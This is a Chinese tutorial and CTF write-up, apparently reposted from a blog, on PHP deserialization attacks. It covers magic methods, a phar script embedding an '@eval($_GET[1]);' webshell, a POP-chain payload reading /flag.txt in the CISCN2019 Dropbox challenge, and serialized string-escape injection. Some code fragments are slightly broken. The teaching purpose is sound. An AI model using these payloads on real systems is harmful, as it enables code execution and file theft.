iis服务器助手广告
返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >PHP反序列化
  • 933
分享到

PHP反序列化

php开发语言 2023-09-01 17:09:26 933人浏览 薄情痞子
摘要

文章目录 简介POP链构造和Phar://题目[CISCN2019 华北赛区 Day1 Web1]Dropbox 字符串逃逸 简介 PHP序列化的过程就是把数据转化成一种可逆的数

文章目录

简介

PHP序列化的过程就是把数据转化成一种可逆的数据结构,逆向的过程就叫做反序列化。
php将数据序列化和反序列化会用到两个函数:
serialize 将对象格式化成有序的字符串
unserialize 经字符串还原成原来的对象。
序列化的目的是方便数据的传输和储存。

序列化得到的结果:

a:3:{i:0;s:4:"anan";i:1;s:3:"shi";i:2;s:2:"zi";}a:array代表是数组,后面的3说明有三个属性i:代表是整型数据int,后面的0是数组下标s:代表是字符串,后面的4是因为anan长度为4    

而如果变量前是protected,则会在变量名前加上\x00*\x00,private则会在变量名前加上\x00类名\x00,输出时一般需要url编码,若在本地存储更推荐采用base64编码的形式,如下:

class test{    protected  $a;    private $b;    function __construct(){$this->a = "anan";$this->b="lan";}    function happy(){return $this->a;}}$a = new test();echo serialize($a);echo urlencode(serialize($a));?>

输出则会导致不可见字符\x00的丢失

O:4:"test":2:{s:4:" * a";s::"anan";s:7:" test b";s:3:"lan";}

反序列化中常见的魔术方法:

__wakeup() //执行unserialize()时,先会调用这个函数
__sleep() //执行serialize()时,先会调用这个函数
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把类当作字符串使用时触发
__invoke() //当尝试将对象调用为函数时触发

POP链构造和Phar://

为什么要用POP链:做题过程中没有那么多的魔术方法可以绕过,审计代码的过程中只有普通的方法,但是不能直接利用,这是需要通过POP链联系起来。
phar://协议就是数据流包装器

class hello{var $a = '';}@unlink('test.phar');$phar=new Phar('test.phar');$phar->startBuffering();$phar->setStub('');$b = new hello();$b->a = '@eval($_GET[1]);';$phar->setMetadata($b);$phar->addFromString("test.txt","test");$phar->stopBuffering();?>

会生成test.phar

题目[CISCN2019 华北赛区 Day1 WEB1]Dropbox

打开后是一个登录框,注册登录发现可以上传文件,尝试上传,只能上传图片文件
在这里插入图片描述
抓包后修改Content-Type:image/jepg后上传成功
在这里插入图片描述
这里可以下载删除,可以利用这个点抓包,尝试读取文件
在这里插入图片描述
尝试查看flag,文件不存在,尝试下载源码,发现还是文件不存在,这里是目录跳转所以不存在
尝试跳转
在这里插入图片描述
可以下载需要的文件,index.php,login.php,upload.php,download.php,delete.php,class.php
进行代码审计,发现class.php中Filelist类中的__call()魔术方法

__call() //在对象上下文中调用不可访问的方法时触发

index.php中函数没有执行会执行__call()魔术方法
在这里插入图片描述
在这里插入图片描述
index.php中的Name和Size方法没有执行,去class.php中查看,File类中有close()方法,读取文件,可以进行文件包含。
POP链构造

a = new FileList()(可以通过Phar://完成)
a - >close() => a - >call(close)

a - >file = new File (‘/flag’)
a - >file - >close()

这里的close()方法需要在class.php中,有User类,其中__destruct()魔术方法,调用close()方法
在这里插入图片描述
构建payload

class User {    public $db;    function __construct()    {        $this->db = new Filelist();    }}class FileList {    private $files;    private $results;    private $funcs;        function __construct()    {       $this->files=[new File('/flag.txt')];       $this->results=[];       $this->funcs=[];    }}class File {    public $filename;    function __construct()    {       $this->filename=$name;    }}$a = new User();$phar=new Phar('test.phar');$phar->startBuffering();$phar->setStub('');$phar->setMetadata($a);$phar->addFromString("test.txt","test");$phar->stopBuffering();?>

生成文件,抓包上传,通过抓包来读取想要的文件
在这里插入图片描述
需要注意的是,在download.php中,限制了访问的目录,所以只能在delete.php中利用payload
在这里插入图片描述

字符串逃逸

过滤后字符变多

function change($str){    return str_replace("x","xx",$str);}$name = $_GET['name'];$age = "I am 11";$arr = array($name,$age);echo "反序列化字符串:";var_dump(serialize($arr));echo "
"
;echo "过滤后:";$old = change(serialize($arr));$new = unserialize($old);var_dump($new);echo "
此时,age=$new[1]"
;?>

这里就是把反序列化后的一个x替换成为两个

我们传入name=maoxxxxxxxxxxxxxxxxxxxx";i:1;s:6:"woaini";}
";i:1;s:6:"woaini";}这一部分一共二十个字符
由于一个x会被替换为两个,我们输入了一共20个x,现在是40个,多出来的20个x其实取代了我们的这二十个字符";i:1;s:6:"woaini";},从而造成";i:1;s:6:"woaini";}的溢出,而"闭合了前串,使得我们的字符串成功逃逸,可以被反序列化,输出woaini,最后的;}闭合反序列化全过程导致原来的";i:1;s:7:“I am 11”;}"被舍弃,不影响反序列化过程

过滤后字符变少

function change($str){    return str_replace("xx","x",$str);}$arr['name'] = $_GET['name'];$arr['age'] = $_GET['age'];echo "反序列化字符串:";var_dump(serialize($arr));echo "
"
;echo "过滤后:";$old = change(serialize($arr));var_dump($old);echo "
"
;$new = unserialize($old);var_dump($new);echo "
此时,age="
;echo $new['age'];

就是把反序列化后的xx替换成为一个x
就是前面少了一半,导致后面的字符被吃掉,从而执行了我们后面的代码,这部分是age序列化后的结果

s:3:"age";s:28:"11";s:3:"age";s:6:"woaini";}"

由于前面是40个x所以导致少了20个字符,所以需要后面来补上,";s:3:“age”;s:28:"11这一部分刚好20个,后面由于有"闭合了前面因此后面的参数就可以由我们自定义执行。
参考PHP反序列化总结
PHP序列化和反序列化

来源地址:https://blog.csdn.net/qq_63267612/article/details/129266499

--结束END--

本文标题: PHP反序列化

本文链接: https://www.lsjlt.com/news/389088.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • PHP序列化和反序列化
    一.什么是序列化和反序列化 php类与对象 类是定义一系列属性和操作的模板,而对象,就是把属性进行实例化,完事交给类里面的方法,进行处理。 `。尝试构造payload: ...
    99+
    2023-08-31
    php 开发语言
  • PHP反序列化
    文章目录 简介POP链构造和Phar://题目[CISCN2019 华北赛区 Day1 Web1]Dropbox 字符串逃逸 简介 php序列化的过程就是把数据转化成一种可逆的数...
    99+
    2023-09-01
    php 开发语言
  • CTF-PHP反序列化
    CTFSHOW-关卡254到258-原生类&POP构造 CTF-254-对象引用执行逻辑 username=xxxxxx&password=xxxxxx 解题思路:触发vipOneKeyGetFlag这个方法,同时让方法中的判断为真才能获...
    99+
    2023-09-22
    php java 开发语言
  • PHP的序列化和反序列化入门
    什么是PHP序列化 serialize() //将一个对象转换成一个字符串unserialize() //将字符串还原成一个对象 通过序列化与反序列化我们可以很方便的在PHP中进行对象的传递。本质上反序列化是没有危害的。但是如果...
    99+
    2023-10-27
    android
  • PHP 反序列化漏洞
    PHP反序列化漏洞在实际测试中出现的频率并不高,主要常出现在CTF中。 PHP序列化概述 PHP序列化函数: serialize:将PHP的数据,数组,对象等序列化为字符串unserialize:将序列化后的字符串反序列化为数据,数组,对...
    99+
    2023-09-01
    php web安全
  • PHP反序列化与SESSION
    php存储session的三种模式 php_serialize(php=>5.5.4) 经过serialize()函数序列化数组 php 键名+竖线+经过seralize()序列处理的值 php_biary 键名的长度对应ASC...
    99+
    2023-09-16
    php 开发语言 web安全
  • php 反序列化总结
    果然不记笔记过一段时间就有一些东西忘了,这里给大家一个参考,如果有什么不对,希望各位师傅可以提出来。 目录 基本 序列化 serialize函数  json_encode函数 反序列化 unserialize函数 json_decode函数...
    99+
    2023-09-16
    学习 php 开发语言 经验分享
  • 反序列化漏洞(PHP)
    反序列化漏洞 0x01. 序列化和反序列化是什么 序列化:变量转换为可保存或传输的字符串的过程; 反序列化:把序列化的字符串再转化成原来的变量使用 作用:可轻松地存储和传输数据,使程序更...
    99+
    2023-09-03
    php web安全 安全
  • [Java反序列化]—Shiro反序列化(一)
    环境配置:  IDEA搭建shiro550复现环境_普通网友的博客-CSDN博客 漏洞原理: Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对remem...
    99+
    2023-09-03
    java 开发语言
  • 序列化与反序列化
    序列化(pickling)   把变量从内存中变成可存储或传输的过程 反序列化(unpickling)   把变量内容从序列化的对象重新读到内存里的过程 序列化&反序列化的意义  在程序运行过程中,对象可在内存中被自由的修改  一...
    99+
    2023-01-31
    序列 化与 序列化
  • 【反序列化漏洞-01】序列化与反序列化概述
    为什么要序列化 百度百科上关于序列化的定义是,将对象的状态信息转换为可以存储或传输的形式(字符串)的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区(非关系型键值对形式的数据库Redis,与数组类似)。以后,可以通过从存储区中...
    99+
    2023-09-06
    web安全 安全 反序列化 序列化 PHP反序列化漏洞 Powered by 金山文档
  • PHP中的序列化和反序列化是什么
    这篇“PHP中的序列化和反序列化是什么”文章,文中示例代码介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要参考一下,对于“PHP中的序列化和反序列化是什么”,小编整理了以下知识点,请大家跟着小编的步伐一步一步的慢慢理解,接下来就让...
    99+
    2023-06-06
  • CTF php反序列化总结
    前言:本⼈⽔平不⾼,只能做⼀些类似收集总结这样的⼯作,本篇文章是我自己在学php反序列化写的一篇姿势收集与总结,有不对的地方欢迎师傅们批评指正~ php反序列化 定义:序列化就是将对象转换成字符串。反...
    99+
    2023-08-31
    php web安全 网络安全
  • pikachu靶场-PHP反序列化
    在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。 序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象: class S{ ...
    99+
    2023-09-02
    php 开发语言 安全 web安全 网络安全
  • 【反序列化漏洞-02】PHP反序列化漏洞实验详解
    为什么要序列化 百度百科上关于序列化的定义是,将对象的状态信息转换为可以存储或传输的形式(字符串)的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区(非关系型键值对形式的数据库Redis,与数组类似)。以后,可以通过从存储区中...
    99+
    2023-09-21
    序列化 反序列化 PHP反序列化漏洞 PHP魔术方法 网络安全 Powered by 金山文档
  • Java序列化与反序列化
    目录Java 序列化与反序列化序列化APIObjectOutputStreamObjectInputStreamserialVersionUIDTransient (瞬态变量)实例理...
    99+
    2023-05-14
    Java序列化 Java反序列化
  • Think PHP 6.0.13反序列化分析
    原poc链接:https://github.com/top-think/framework/issues/2749 think PHP 6.0.13下载 composer create-project topthink/think tp p...
    99+
    2023-10-06
    php web安全
  • 协议,序列化,反序列化,Json
    文章目录 协议序列化和反序列化网络计算器protocol.hppServer.hppServer.ccClient.hppClient.cclog.txt通过结果再次理解通信过程 Json...
    99+
    2023-09-01
    json 网络 服务器
  • php浅析反序列化结构
    目录简介反序列化中常见的魔术方法反序列化绕过小Trick绕过_wakeup(CVE-2016-7124)绕过部分正则利用引用16进制绕过字符的过滤简介 序列化的目的是方便数据的传输和...
    99+
    2024-04-02
  • thinkphp5 注入 反序列化写文件 phar反序列化
    原文出处: 红队攻击第3篇 thinkphp5框架 注入 反序列化写文件 phar反序列化 (qq.com) 1.SQL注入1 ...
    99+
    2023-09-10
    sql web安全 php
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作